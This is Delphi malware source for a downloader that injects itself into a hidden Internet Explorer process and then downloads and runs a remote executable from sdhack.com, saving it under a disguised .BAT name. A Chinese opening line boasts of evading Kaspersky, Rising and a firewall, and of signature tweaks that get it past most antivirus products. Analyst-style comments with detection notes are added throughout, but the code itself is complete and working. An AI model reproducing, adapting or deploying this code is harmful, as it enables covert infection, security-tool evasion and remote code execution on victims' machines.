编译好后测试能过卡巴瑞星,穿天网3.0,但全球有12款杀毒过不了,最后用冰风文件防火墙改下特征码就能过90%的杀毒了。
// Analysis summary: this program copies its own image into an Internet Explorer
// process it starts itself, then runs a download-and-execute routine there on a
// remote thread (see Inject and DDownlload below).
program IInjectTTheSelf;
// Non-default image base. Inject re-allocates the image at this same address in
// the target process, so the fixed base is presumably chosen to be free there.
// The value in the PE header is a static attribute usable for triage.
{$IMAGEBASE $13140000}
uses Windows;
var
// Function pointer later bound to Shell32!ShellExecuteA via GetProcAddress.
RunRShell:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
// Function pointer later bound to urlmon!URLDownloadToFileA via GetProcAddress.
// Both APIs are resolved at run time in DDownlload rather than through a uses clause.
filefDown:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
// Module handles for Shell32.dll and urlmon.dll, filled in by DDownlload.
hShell,hUrlmon: THandle;
// Returns the path of IEXPLORE.EXE.
// Reads the default value of the HKLM "App Paths\IEXPLORE.EXE" key; if the query
// fails, returns a hard-coded fallback string instead.
function GGetIEAAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
// KEY_ALL_ACCESS is requested although only a read follows. The return value is
// not checked, so iekey may be unset when the query below runs.
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
// Empty value name = the key's default value.
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
// Fallback is a literal string containing %programfiles%; no expansion call is
// visible in this function.
Result := '%programfiles%\Internet Explorer\IEXPLORE.EXE';
RegCloseKey(iekey);
end;
// Download-and-execute routine. RRunIInject passes its address to Inject as the
// remote thread entry point, so it is meant to run inside the target process.
// Indicators visible in this block: the URL http://www.sdhack.com/123.exe and the
// drop path C:\WINDOWS\temp\AUT0EXEC.BAT (digit 0 in place of the letter O).
// No return value is checked anywhere in the routine.
procedure DDownlload;
begin
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell:=LoadLibrary('Shell32.dll');
hUrlmon:=LoadLibrary('urlmon.dll');
// Both APIs are looked up by name at run time.
@RunRShell:= GetProcAddress(hShell,'ShellExecuteA');
@filefDown:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
// Fetches the remote file and stores it under a .BAT name, although the URL ends in .exe.
filefDown(nil,'http://www.sdhack.com/123.exe','C:\WINDOWS\temp\AUT0EXEC.BAT', 0, nil);
// Opens the dropped file; show command 5 is SW_SHOW.
RunRShell(0,'open','C:\WINDOWS\temp\AUT0EXEC.BAT',nil,nil,5);
// Terminates the process this routine is running in (presumably the injected
// IE instance - confirm against the call path).
ExitProcess(0);
end;
// Copies this program's whole in-memory image into another process at the same
// base address and starts a thread there.
//   ProcessHandle - handle to the target process (opened by the caller).
//   EntryPoint    - address, within this image, where the remote thread starts.
// None of the API return values are checked.
// Detection note: the sequence VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
// WriteProcessMemory -> CreateRemoteThread against another process, with the
// thread start address inside the newly written region, is the observable
// behaviour of this block.
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
MModule, NewNModule: Pointer;
Extent, BytesWritten, TID: longword;
begin
// Base address of the current executable image.
MModule := Pointer(GetModuleHandle(nil));
// SizeOfImage from the PE optional header: base + e_lfanew + 4-byte signature +
// file header gives the optional header.
Extent := PImageOptionalHeader(Pointer(integer(MModule) + PImageDosHeader(MModule)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
// Releases whatever region sits at the same address in the target.
VirtualFreeEx(ProcessHandle, MModule, 0, MEM_RELEASE);
// Requests the same address in the target with read/write/execute protection.
// The returned address is not compared with MModule.
NewNModule := VirtualAllocEx(ProcessHandle, MModule, Extent, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(ProcessHandle, NewNModule, MModule, Extent, BytesWritten);
// EntryPoint is a local address; it is only meaningful in the target if the
// image landed at the same base. MModule is passed as the thread parameter.
// The returned thread handle is discarded.
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, MModule, 0, TID);
end;
// Selects a target process and injects DDownlload into it.
//   IInjTType - 1 starts Internet Explorer hidden and targets it; for any other
//               value PID is never assigned before OpenProcess is called.
// Detection note: a hidden IEXPLORE.EXE started by this program, followed by the
// same program opening that process with PROCESS_ALL_ACCESS, is the observable
// behaviour of this block. Network traffic then originates from the browser
// process, which is presumably what the page's firewall claim relies on.
procedure RRunIInject(IInjTType:integer);
var
ProcessHandle, PID: longword;
begin
if IInjTType=1 then
begin
// Start IE with its window hidden.
winexec(PChar(GGetIEAAppPath),sw_hide);
// Fixed one-second wait for the browser window to be created.
sleep(1000);
// Looks up a top-level window of class 'IEFrame' and takes its process id.
// The FindWindow result is not checked.
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
end;
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @dDownlload);
CloseHandle(ProcessHandle);
end;
// Program entry: always uses injection type 1 (the hidden Internet Explorer target).
Begin
RRunIInject(1);
end.